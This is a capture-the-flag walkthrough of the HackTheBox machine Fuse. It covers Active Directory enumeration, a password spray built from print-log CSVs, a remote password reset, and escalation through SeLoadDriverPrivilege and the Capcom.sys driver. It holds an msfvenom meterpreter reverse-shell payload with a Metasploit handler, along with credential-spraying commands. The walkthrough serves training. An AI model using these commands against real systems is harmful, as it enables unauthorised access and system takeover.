SecWalk.com

HTB Walkthrough Fuse 10.10.10.193

Box Summary:

Fuse was released on 13 June 2020 and is rated Medium.

From nmap we can see we are dealing with an Active Directory machine. Port 80 redirects to a DNS name; after adding that name to /etc/hosts we can view the page, a print server page that contains the print job history, including valuable data such as usernames. After poking around a bit we concluded that we needed a password. Kerberoasting did not work, so we needed something else. After a lot of trying we built a password list from the CSV files on the print page, and it turned out to contain a valid password, but the user has to change that password before it can be used. After changing the password we were able to enumerate the machine and found another set of credentials, which gave us a shell through evil-winrm and the user flag. That user has SeLoadDriverPrivilege enabled, which we abused to become administrator on the machine.

Enumeration

nmap -sV -sC 10.10.10.193

Web Page

In order to access the web page, we need to add the following to /etc/hosts (the IP is the box, the name is where port 80 redirects to):

10.10.10.193 fuse.fabricorp.local

When we go to the web page, we see the print job history, which can also be downloaded as CSV files:

By reviewing the CSV files, I found several users:

Users found:

  • pmerton
  • tlavel
  • stompson
  • bhult
  • administrator
  • bnielson
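
Building the user list and a first password list out of the print logs is the step that unlocks this box, so here is a script that does it. It is an added example for this walkthrough, not code from the original page or from the box: it assumes the CSV export has a header row with a "User" column (no other column names are relied on), and SAMPLE_CSV is constructed sample data in a print-log style, not the real logs from Fuse.

```python
#!/usr/bin/env python3
"""Pull usernames and candidate passwords out of exported print-log CSVs.

Added example for this walkthrough, not code from SecWalk or the box. It
assumes the export has a header row with a "User" column (other column
names are not relied on); the CSV text below is constructed sample data,
not the real logs from Fuse.
"""
import csv
import io
import re
from typing import Iterable, List, Set, Tuple

# Constructed sample: header plus three job rows in a print-log style layout.
SAMPLE_CSV = """\
Time,User,Pages,Copies,Printer,Document Name,Client,Paper Size,Duplex,Size
2020-05-28 09:11:03,bhult,1,1,HP-MFP-01,Fabricorp01.docx,LAPTOP01,A4,NOT DUPLEX,64kb
2020-05-28 09:14:22,tlavel,3,1,HP-MFP-01,Budget_2020.xlsx,LAPTOP02,A4,DUPLEX,120kb
2020-05-28 10:02:47,bhult,2,2,HP-MFP-01,Onboarding Guide v2.pdf,LAPTOP01,Letter,DUPLEX,1.2mb
"""

# Something a person might type as a password: 6+ chars, letters/digits/common symbols.
TOKEN_RE = re.compile(r"[A-Za-z0-9@$!#%_-]{6,}")
# Dates and sizes would only waste spray attempts.
NOISE_RE = re.compile(r"^\d+(kb|mb|gb)?$|^\d{4}-\d{2}-\d{2}$", re.I)


def parse_print_log(text: str) -> List[dict]:
    """Return the rows of a print-log CSV as dicts keyed by header name.
    The header is the first line containing a cell named "User" (some
    exports prepend a title line, so we do not assume it is line 1)."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if "user" in (c.strip().lower() for c in line.split(",")):
            return list(csv.DictReader(io.StringIO("\n".join(lines[i:]))))
    raise ValueError("no header row with a User column")


def usernames(rows: Iterable[dict]) -> List[str]:
    """Unique user values, lower-cased, in first-seen order."""
    seen: Set[str] = set()
    out: List[str] = []
    for row in rows:
        for key, value in row.items():
            if key and key.strip().lower() == "user" and value:
                u = value.strip().lower()
                if u not in seen:
                    seen.add(u)
                    out.append(u)
    return out


def password_candidates(rows: Iterable[dict]) -> List[str]:
    """Tokens from every non-user field (document names, printer names,
    client names) that look like something a person might reuse as a
    password. File extensions are stripped, dates and sizes are dropped,
    and first-seen order is kept so the list is deterministic."""
    seen: Set[str] = set()
    out: List[str] = []
    for row in rows:
        for key, value in row.items():
            if not key or key.strip().lower() == "user" or not value:
                continue
            base = re.sub(r"\.[A-Za-z0-9]{1,5}$", "", value.strip())
            for tok in TOKEN_RE.findall(base):
                if NOISE_RE.match(tok) or tok in seen:
                    continue
                seen.add(tok)
                out.append(tok)
    return out


def build_lists(text: str) -> Tuple[List[str], List[str]]:
    """(usernames, password candidates) for one CSV export."""
    rows = parse_print_log(text)
    return usernames(rows), password_candidates(rows)


if __name__ == "__main__":
    users, words = build_lists(SAMPLE_CSV)
    print("users:", users)
    print("candidates:", words)
```

Run it over every CSV the page offers and concatenate the results; the candidate list is deliberately loose (printer and client names are kept) because the point is a short, targeted spray, not a dictionary attack.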

Enumerating SMB shares

I tried crackmapexec with the found usernames (and an empty password) to enumerate SMB shares, but without success. The command below is reconstructed, because the line on the original page was truncated:

crackmapexec smb 10.10.10.193 -u usernames.txt -p '' --shares

After this I tried to log in with the found usernames. I tried some common passwords and also words taken from the CSV files, which is where Fabricorp01 came from. With rpcclient the credentials are passed as user%password:

rpcclient -U 'bhult%Fabricorp01' 10.10.10.193

The DC accepts the password for bhult but refuses the logon with NT_STATUS_PASSWORD_MUST_CHANGE: the credential is valid, the account only has to set a new password before it can be used.

Changing the password with smbpasswd

smbpasswd can change a domain password remotely: -r is the remote machine and -U the account. It prompts for the old password and then for the new one. This is a destructive change (the user's own password stops working), so on a real engagement it needs to be agreed on beforehand.

smbpasswd -r 10.10.10.193 -U bhult

With the new password the rpcclient login works:

rpcclient -U bhult 10.10.10.193

Enumerating Users

enumdomusers

The user list contains a service account, svc-print, which we need to keep in mind.

Enumerating Printers

enumprinters

One of the printer entries has a password in its description:

$fab@s3Rv1ce$1

Exploitation

Now that we have a password, we can try it with evil-winrm. The only user that could log in with $fab@s3Rv1ce$1 was svc-print, the service account from enumdomusers.

Post-Exploitation

I checked the privileges on our token to see whether any of them could be used to escalate:

whoami /priv

SeLoadDriverPrivilege is enabled.
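
Reading whoami /priv by eye works on a short list, but it is worth having a small triage helper. The script below is an added example for this walkthrough (not code from the page or from IceL0rd's repository): SAMPLE is constructed in whoami's layout and is not the real output from Fuse, and ESCALATION_PRIVS is my own list of the privileges with well-known escalation routes.

```python
#!/usr/bin/env python3
"""Triage `whoami /priv` output for privileges that lead to escalation.

Added example for this walkthrough, not code from the page. SAMPLE is
constructed to match the layout whoami prints (a header, a separator row
of '=' runs, then one privilege per line); it is not the real output from
Fuse. ESCALATION_PRIVS is the author's own list, not something whoami knows.
"""
from typing import Dict, List, Tuple

# Constructed sample in whoami /priv's fixed-width layout.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# Privileges with well-known paths to SYSTEM, and why they matter.
ESCALATION_PRIVS = {
    "SeLoadDriverPrivilege": "load an arbitrary kernel driver (the route used on this box)",
    "SeImpersonatePrivilege": "impersonate a SYSTEM token (potato family)",
    "SeAssignPrimaryTokenPrivilege": "start a process under another token",
    "SeBackupPrivilege": "read any file, including SAM and NTDS.dit",
    "SeRestorePrivilege": "write any file or registry key",
    "SeTakeOwnershipPrivilege": "take ownership of any object",
    "SeDebugPrivilege": "open and inject into any process",
}


def column_starts(separator: str) -> List[int]:
    """Start offset of every run of '=' in the separator row."""
    starts: List[int] = []
    prev = " "
    for pos, ch in enumerate(separator):
        if ch == "=" and prev != "=":
            starts.append(pos)
        prev = ch
    return starts


def parse_priv(output: str) -> Dict[str, Tuple[str, str]]:
    """Return {name: (description, state)} from whoami /priv text.
    Column boundaries come from the '=' separator row rather than from
    whitespace, because descriptions contain spaces."""
    lines = output.splitlines()
    sep_idx = next(i for i, line in enumerate(lines) if line.startswith("="))
    _, desc_at, state_at = column_starts(lines[sep_idx])[:3]
    privs: Dict[str, Tuple[str, str]] = {}
    for line in lines[sep_idx + 1:]:
        if not line.strip():
            continue
        name = line[:desc_at].strip()
        desc = line[desc_at:state_at].strip()
        state = line[state_at:].strip()
        privs[name] = (desc, state)
    return privs


def escalation_candidates(output: str) -> List[Tuple[str, str, str]]:
    """Every assigned privilege from ESCALATION_PRIVS as (name, state, why).
    A 'Disabled' entry is still assigned to the token and the process can
    enable it itself (AdjustTokenPrivileges), so it counts; only privileges
    missing from the list entirely are unavailable."""
    privs = parse_priv(output)
    return [(n, privs[n][1], why) for n, why in ESCALATION_PRIVS.items() if n in privs]


if __name__ == "__main__":
    for name, state, why in escalation_candidates(SAMPLE):
        print(f"{name} [{state}]: {why}")
```

The state column is the part people misread: "Disabled" in whoami only means the privilege is not currently enabled in this token, not that it has been taken away, so the helper reports assigned privileges regardless of state.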

Resource: https://github.com/IceL0rd4Real/EoPLoadDriver

We follow the instructions on that GitHub page.

Note: this GitHub repository is owned by IceL0rd. SecWalk is not responsible for its content or for any damage caused by it.

Uploading Capcom.sys and eoploaddriver64.exe with evil-winrm's upload command

upload Capcom.sys

upload eoploaddriver64.exe

Before we run this, we need an MSF payload that gives us a meterpreter shell.

Getting Meterpreter Shell

In order to generate a meterpreter payload we need to use the following command.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=4444 -f exe -o meterpreter.exe

Now we upload it to the system.

upload meterpreter.exe

Setting up the handler in Metasploit.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
exploit -j

Now we run meterpreter.exe on the box and get a meterpreter session.

Now we run eoploaddriver64.exe in our evil-winrm shell. The first argument is the registry path the tool creates under HKCU (which we can write, unlike HKLM) to register the driver, the second is the driver file to load:

./eoploaddriver64.exe System\CurrentControlSet\custom C:\Users\svcprint\Documents\Capcom.sys

The tool reports an error, but the driver is loaded, and that is all we need: Metasploit has a local exploit for the loaded Capcom.sys driver, which is why we set up the meterpreter session.

Back in msfconsole, with the meterpreter session open:

use exploit/windows/local/capcom_sys_exec

set session 1

To get this to work we had to edit the module and disable its check function. After that the exploit runs and we have a SYSTEM shell: the machine is rooted.

Made by: IceL0rd

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.
